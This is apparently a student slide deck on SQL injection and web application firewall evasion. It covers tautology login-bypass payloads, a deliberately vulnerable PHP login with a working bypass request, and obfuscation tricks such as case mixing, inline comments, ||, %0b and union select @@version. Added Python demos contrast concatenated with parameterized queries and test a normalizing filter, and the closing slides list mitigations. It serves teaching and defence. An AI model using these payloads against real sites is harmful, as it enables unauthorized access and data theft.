All Ab0ut 0f SQL Injection and WAF Bypass Techniques


Page 1: All Ab0ut 0f SQL Injection and WAF Bypass Techniques


THATSANAI DETDAMRONGPREEECHA

COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG

Page 2

What is SQL Injection?

SQL injection is a code injection attack.

It happens when a user injects SQL commands that change the query's condition,

because the developer did not filter the input coming from the user.

Page 3

Logical Conjunction and Disjunction table

Page 4

SQL Operators

AND, &&

OR, ||

LIKE

*

( , )

< , >

+, -, *, /, %

Page 5

SQL Comments

End of line:

"#"

"--"

"-- " (in MySQL the -- form only starts a comment when it is followed by a space or other whitespace)

Multiple lines:

"/* */"

Page 6

Examples

Vulnerable queries and the injected input

Page 7

sql command :

SELECT first_name, last_name FROM users WHERE user_id = '$id'

Inject code :

SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'
SELECT first_name, last_name FROM users WHERE user_id = 'am' or 'am'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '1'='1'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '2600'='2600'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 'HELLO' or 'HELLO'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 1 #'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or true #'

Page 8

sql command :

SELECT first_name, last_name FROM users WHERE user_id = $id

Inject code :

true
'1' or '1'
2 or 2

sql command :

SELECT first_name, last_name FROM users WHERE user_id = ($id)

Inject code :

1) or (1
2+3) or (5

Page 9

http://cs.ssru.ac.th/cs01/mae/Pae/ตั�วอย่�างและโปรแกรมที่��โหลดๆมา/Login_thaicreate/PHP MySQL ก�บLogin Form ที่�าระบบ User ล�อกอ�น แบบง�าย่ ๆ ด�วย่ PHP และ MySQL โดย่ที่�าการตัรวจสอบ Username และPassword.htm

Page 10

http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html

Page 11

http://www.exploit-db.com/exploits/26405/

Page 12

http://www.exploit-db.com/exploits/26416/

Page 13

Example

// Vulnerable on purpose: $_GET['username'] is concatenated straight into the
// SQL string, so quote and comment characters in it become SQL syntax.
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
    die('Invalid SQL query');
// Login succeeds when the query returns exactly one row.
if (mysql_num_rows($result) == 1) {
    echo "Congrats, WIN!!!\n";
}
else {
    echo "The number of rows is not 1\n";
}

// Request from the slide that passes the one-row check without a valid password:
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
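The login check above, and the quoted-context tautologies from page 7, can be run end to end in Python against an in-memory SQLite table. This is an added example and not code from the slides: the table contents and user names are constructed, and because SQLite has no "#" comment, the slide's payload is written with the "-- " comment form from page 5 instead (an assumption for this demo). The second function shows the page-22 fix, a parameterized query, against the same inputs.

```python
import hashlib
import sqlite3

# Constructed sample rows; names and passwords are assumptions, not slide data.
MEMBERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory members table mirroring the slide's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    for user, pw in MEMBERS:
        # The slide stores md5(password); kept only to mirror it. md5 is not a
        # suitable password hash for a real application.
        conn.execute("INSERT INTO members VALUES (?, ?)",
                     (user, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-concatenated query, as in login_sqli1.php on the slide."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT * FROM members WHERE password='" + pw_hash
           + "' AND username='" + username + "'")
    rows = conn.execute(sql).fetchall()
    return len(rows) == 1          # the slide's "exactly one row" success check


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with a parameterized query: input never becomes SQL syntax."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT * FROM members WHERE password=? AND username=?",
        (pw_hash, username),
    ).fetchall()
    return len(rows) == 1


# The slide's payload ends in MySQL's '#' comment; SQLite only knows '--',
# so the same input is written with '-- ' here (assumption for this demo).
PAYLOAD = "' or 1=1 LIMIT 1-- "


def demo() -> dict:
    """Run a legitimate login and the payload through both implementations."""
    conn = make_db()
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "s3cret"),
        "legit_safe": login_safe(conn, "alice", "s3cret"),
        "payload_vulnerable": login_vulnerable(conn, PAYLOAD, "whatever"),
        "payload_safe": login_safe(conn, PAYLOAD, "whatever"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the concatenated query the injected username closes the quote, adds a tautology, keeps the row count at one and comments out the trailing quote, so the check passes with a wrong password; with placeholders the whole string is compared as a username and no row matches. The PHP equivalent of login_safe is a PDO prepare() with "?" placeholders followed by execute() with the values.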

Page 14

Impact

Read information from the database

Can be used to gain access to the system

Etc.

Page 15

Bypass Web Application Firewall

Techniques

Page 16

What is a Web Application Firewall?

A web application firewall (WAF) is software or hardware

that focuses on protecting a website:

it filters all data at the application layer

and can detect and block attacks against the website.

Page 17

How to Bypass?

Original:

1' or '1'='1
union all select 1,2,3,4,5 --
union all select 1,2,@@version,4,5 --

Solution:

1' oR '1'='1
uNIon AlL sELeCt 1,2,3,4,5 --
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --

Page 18

How to Bypass? (cont.)

If the filter blocks "or" and "and"

Solution: use || instead of or

and && instead of and (in MySQL's default SQL mode these are synonyms)

Page 19

How to Bypass? (cont.)

If the filter blocks "where"

Solution: use "limit" instead of "where"

If the filter blocks "limit"

Solution: use "group by" and "having" instead of "where"

Page 20

How to Bypass? (cont.)

If the filter blocks whitespace

Solution: use %0b (vertical tab) instead of a space

If the filter blocks the single quote '

Solution: use a hex literal 0xXX or unhex(xx) instead of a quoted string
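As an added example that is not part of the slides, here is the defender's side of pages 17 to 20: a naive substring signature of the kind the obfuscated forms above slip past, and the same signature applied after the parameter is canonicalized (URL-decoded, inline comments stripped, || and && mapped back to or and and, all whitespace including %0b collapsed, case folded). The sample inputs are the slides' own strings plus a %0b-separated variant constructed from the page-20 whitespace trick; the signature list and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Naive, byte-exact signatures: the kind of rule the obfuscations on the
# slides are designed to slip past. Assumed for this example.
SIGNATURES = ["union all select", "or '1'='1"]


def naive_match(raw: str) -> bool:
    """Signature check on the raw parameter value, with no normalization."""
    return any(sig in raw for sig in SIGNATURES)


def normalize(raw: str) -> str:
    """Canonicalize a parameter value before matching it against signatures."""
    s = unquote(raw)                                    # %0b, %27, ... become real characters
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)         # drop inline /* ... */ comments
    s = s.replace("||", " or ").replace("&&", " and ")  # MySQL default-mode synonyms
    s = re.sub(r"\s+", " ", s)                          # collapse any whitespace, \x0b included
    return s.lower().strip()


def normalized_match(raw: str) -> bool:
    """Signature check after canonicalization."""
    return naive_match(normalize(raw))


# Constructed sample: the slides' original and obfuscated forms, plus a
# %0b-separated variant built from the page-20 whitespace substitution.
SAMPLES = [
    "1' or '1'='1",
    "union all select 1,2,3,4,5 --",
    "1' oR '1'='1",
    "1' || '1'='1",
    "uNIon AlL sELeCt 1,2,3,4,5 --",
    "u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --",
    "union%0ball%0bselect%0b1,2,3,4,5%0b--",
]


def evaluate(samples=SAMPLES):
    """Return (input, caught by naive rule, caught after normalization) per sample."""
    return [(s, naive_match(s), normalized_match(s)) for s in samples]


if __name__ == "__main__":
    for sample, naive, normed in evaluate():
        print(f"naive={naive!s:5} normalized={normed!s:5}  {sample!r}")
```

Only the two unobfuscated inputs trip the raw rule; after canonicalization all seven do. Canonicalization closes the specific gaps listed on these slides, but keyword substitutions such as "limit" or "group by ... having" in place of "where" (page 19) show why signature matching is only a secondary control: the parameterized query recommended on page 22 removes the injection instead of guessing its spelling.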

Page 21

How to Mitigate

Page 22

Top 5 Secure Coding Tips for PHP applications

Filter input data: GET, POST, COOKIE

Secure database queries

Filter output data: htmlspecialchars(), htmlentities(), strip_tags(), strtr()

Error handling: log_errors = On, display_errors = Off

Prevent other injection attacks

Page 23

References and Appendix

www.owasp.org

http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/

http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html

http://thtutz.blogspot.com